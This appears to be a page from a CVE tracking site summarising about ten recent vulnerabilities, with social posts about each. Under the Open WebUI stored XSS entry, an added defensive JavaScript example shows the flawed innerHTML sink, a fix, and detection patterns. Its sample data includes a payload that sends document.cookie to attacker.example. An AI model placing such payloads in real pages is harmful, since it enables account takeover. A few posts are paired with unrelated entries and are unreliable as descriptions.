
Overview

  • Pending

Published: Pending
Updated: Pending
CVSS: Pending
EPSS: Pending

KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 1 Post

Last activity: 7 hours ago

Bluesky

🚨 Critical patch for #OracleLinux 8: CVE-2025-21140 affects Keylime, a core attestation tool. Remote attackers can cause a DoS, blinding your security monitoring. Read more: 👉 tinyurl.com/565p3yws #Security
  • 7h ago

Overview

  • open-webui
  • open-webui

Published: 08 Nov 2025
Updated: 10 Nov 2025
CVSS v3.1: HIGH (8.7)
EPSS: 0.02%

KEV

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. In versions 0.6.34 and below, the functionality that inserts custom prompts into the chat window is vulnerable to DOM XSS when 'Insert Prompt as Rich Text' is enabled, because the prompt body is assigned to the DOM sink .innerHTML without sanitisation. Any user with permission to create prompts can plant a payload that is triggered in other users' browsers when they run the corresponding '/' command to insert the prompt. This issue is fixed in version 0.6.35.
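The sink the description names, and the fix, as an added example (not Open WebUI's own code): a small allowlist sanitiser stands in for whatever the project uses, the element is a plain object rather than a live DOM node, and the stored prompts and slash commands are constructed. The audit function at the end is the check a defender would run over prompts already stored by other users after upgrading.

```javascript
// Added example, not Open WebUI code. Sample prompts below are constructed.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape so the browser treats the string as text even if it is later assigned to innerHTML.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Minimal allowlist sanitiser for "rich text": keeps a few formatting tags with no attributes and
// escapes every other tag and every stray special character. Event-handler attributes, <script>,
// <img>, <svg> and <a href="javascript:..."> all become inert text. A real deployment should use a
// maintained sanitiser (for example DOMPurify); this one exists to show the idea.
const ALLOWED_TAGS = new Set(['b', 'i', 'em', 'strong', 'code', 'p', 'br']);
const TAG_OR_SPECIAL = /<\/?([A-Za-z][A-Za-z0-9]*)(?:\s[^<>]*)?>|[<>&"']/g;

function sanitizeRichText(html) {
  return String(html).replace(TAG_OR_SPECIAL, (match, tag) => {
    if (tag === undefined) return escapeHtml(match);            // lone < > & " '
    const name = tag.toLowerCase();
    if (!ALLOWED_TAGS.has(name)) return escapeHtml(match);      // unknown element: rendered as text
    return match.startsWith('</') ? `</${name}>` : `<${name}>`; // allowed element: attributes dropped
  });
}

// Vulnerable shape from the CVE: the stored prompt body is assigned to innerHTML unchanged.
function insertPromptVulnerable(el, promptBody) {
  el.innerHTML = promptBody; // <img onerror=...> in promptBody executes in the victim's session
}

// Hardened shape: plain prompts go through textContent (never parsed as markup);
// rich-text prompts go through the sanitiser first.
function insertPromptFixed(el, promptBody, richText) {
  if (richText) {
    el.innerHTML = sanitizeRichText(promptBody);
  } else {
    el.textContent = promptBody;
  }
}

// Defender's side: scan prompts other users have already stored for markup that only makes sense
// as a payload. Heuristic; review anything flagged by hand.
const SUSPICIOUS_MARKUP = [
  /<script\b/i, /[\s/]on[a-z]+\s*=/i, /javascript\s*:/i, /<iframe\b/i, /<svg\b/i, /<object\b/i,
];

function findSuspiciousPrompts(prompts) {
  return prompts
    .filter((p) => SUSPICIOUS_MARKUP.some((re) => re.test(p.content)))
    .map((p) => p.command);
}

// Constructed sample of stored prompts, keyed by the slash command that inserts each one.
const SAMPLE_PROMPTS = [
  { command: '/summarise', content: 'Summarise the following text in three bullet points:' },
  { command: '/formal', content: '<b>Instruction:</b> answer in formal English.' },
  { command: '/evil', content: '<img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">' },
  { command: '/link', content: '<a href="javascript:alert(document.domain)">click me</a>' },
];

console.log('prompts to review:', findSuspiciousPrompts(SAMPLE_PROMPTS));
```

The textContent path is the right default: the prompt body is user data, and a chat client has no reason to parse it as markup. If rich text is a product requirement, the sanitiser has to run on the client at insertion time, because the body was stored by a user the viewer does not control.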

Statistics

  • 1 Post

Last activity: 6 hours ago

Fediverse

🚨CVE-2025-64495: Open WebUI vulnerable to Stored DOM XSS via prompts when 'Insert Prompt as Rich Text' is enabled resulting in ATO/RCE

CVSS: 8.7

PoC & Advisory: github.com/open-webui/open-web

FOFA Query: app="Open-WebUI"

FOFA Results: 151,305

  • 6h ago

Overview

  • SAP_SE
  • SAP Solution Manager

Published: 11 Nov 2025
Updated: 12 Nov 2025
CVSS v3.1: CRITICAL (9.9)
EPSS: 0.05%

KEV

Description

Due to missing input sanitisation, SAP Solution Manager allows an authenticated attacker to insert malicious code when calling a remote-enabled function module. This could give the attacker full control of the system, with high impact on its confidentiality, integrity and availability.

Statistics

  • 1 Post

Last activity: 16 hours ago

Fediverse

"Due to missing input sanitation, SAP Solution Manager allows an authenticated attacker to insert malicious code when calling a remote-enabled function module. This could provide the attacker with full control of the system hence leading to high impact on confidentiality, integrity and availability of the system."
Base Score: 9.9 CRITICAL

nvd.nist.gov/vuln/detail/CVE-2

#SAP #CyberSecurity

  • 16h ago

Overview

  • IBM
  • AIX

Published: 13 Nov 2025
Updated: 15 Nov 2025
CVSS v3.1: CRITICAL (10.0)
EPSS: 0.08%

KEV

Description

The NIM server (formerly known as the NIM master) service, nimesis, in IBM AIX 7.2 and 7.3 and IBM VIOS 3.1 and 4.1 could allow a remote attacker to execute arbitrary commands due to improper process controls. This addresses additional attack vectors for a vulnerability that was previously addressed in CVE-2024-56346.

Statistics

  • 1 Post

Last activity: 6 hours ago

Bluesky

Critical IBM AIX RCE (CVE-2025-36250, CVSS 10.0) Flaw Exposes NIM Private Keys and Risks Directory Traversal
  • 6h ago

Overview

  • Intel(R) Server Board S2600ST Family BIOS and Firmware Update software

Published: 13 Nov 2024
Updated: 14 Nov 2024
CVSS v4.0: MEDIUM (5.4)
EPSS: 0.02%

KEV

Description

An uncontrolled search path in all versions of the Intel(R) Server Board S2600ST Family BIOS and Firmware Update software may allow an authenticated user to escalate privilege via local access.

Statistics

  • 1 Post

Last activity: 14 hours ago

Bluesky

Just published a technical analysis of CVE-2024-34167, a high-severity NULL pointer dereference in libxml2 affecting #openSUSE Leap. Read more: 👉 tinyurl.com/bdf92mu7 #Security
  • 14h ago

Overview

  • Chunghwa Telecom
  • TenderDocTransfer

Published: 17 Nov 2025
Updated: 17 Nov 2025
CVSS v4.0: HIGH (7.0)
EPSS: 0.20%

KEV

Description

TenderDocTransfer, developed by Chunghwa Telecom, has an arbitrary file deletion vulnerability. The application starts a simple local web server and exposes APIs for communication with the target website. Because the APIs lack CSRF protection, unauthenticated remote attackers can invoke them through phishing (a page the user is lured into visiting makes the requests from the user's own browser). Additionally, one of the APIs contains an absolute path traversal vulnerability, allowing attackers to delete arbitrary files on the user's system.

Statistics

  • 1 Post

Last activity: 19 hours ago

Fediverse

🔥 CVE-2025-13282 (HIGH): Chunghwa Telecom TenderDocTransfer allows unauth'd file deletion via CSRF & path traversal flaws. Block app/API ports, educate users, and back up data! No patch yet. Details: radar.offseq.com/threat/cve-20

  • 19h ago

Overview

  • D-Link
  • DIR-816L

Published: 14 Nov 2025
Updated: 17 Nov 2025
CVSS v4.0: CRITICAL (9.3)
EPSS: 0.17%

KEV

Description

A vulnerability was detected in D-Link DIR-816L 2_06_b09_beta in the function authenticationcgi_main of the file /authentication.cgi. Manipulating the argument Password results in a stack-based buffer overflow. The attack can be carried out remotely. The exploit is public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.

Statistics

  • 1 Post
  • 8 Interactions

Last activity: 9 hours ago

Overview

  • Tenda
  • CH22

Published: 17 Nov 2025
Updated: 17 Nov 2025
CVSS v4.0: HIGH (8.7)
EPSS: Pending

KEV

Description

A security vulnerability has been detected in Tenda CH22 1.0.0.1 in the function fromPptpUserSetting of the file /goform/PPTPUserSetting. Manipulating the argument delno leads to a buffer overflow. The attack can be carried out remotely. The exploit has been disclosed publicly and may be used.

Statistics

  • 1 Post
  • 8 Interactions

Last activity: 9 hours ago

Overview

  • D-Link
  • DWR-M920

Published: 17 Nov 2025
Updated: 17 Nov 2025
CVSS v4.0: HIGH (8.7)
EPSS: Pending

KEV

Description

A weakness has been identified in D-Link DWR-M920, DWR-M921, DWR-M960, DIR-822K and DIR-825M 1.01.07. It affects unspecified processing of the file /boafrm/formTracerouteDiagnosticRun. Manipulating the argument host can lead to a buffer overflow. The attack may be launched remotely. The exploit has been made public and could be used.

Statistics

  • 1 Post
  • 2 Interactions

Last activity: 1 hour ago

Overview

  • D-Link
  • DWR-M920

Published: 17 Nov 2025
Updated: 17 Nov 2025
CVSS v4.0: MEDIUM (5.3)
EPSS: Pending

KEV

Description

A security vulnerability has been detected in D-Link DWR-M920, DWR-M921, DIR-822K and DIR-825M 1.1.5 in the function system of the file /boafrm/formDebugDiagnosticRun. Manipulating the argument host leads to command injection. The attack can be carried out remotely. The exploit has been disclosed publicly and may be used.

Statistics

  • 1 Post
  • 2 Interactions

Last activity: 1 hour ago
Showing 21 to 30 of 32 CVEs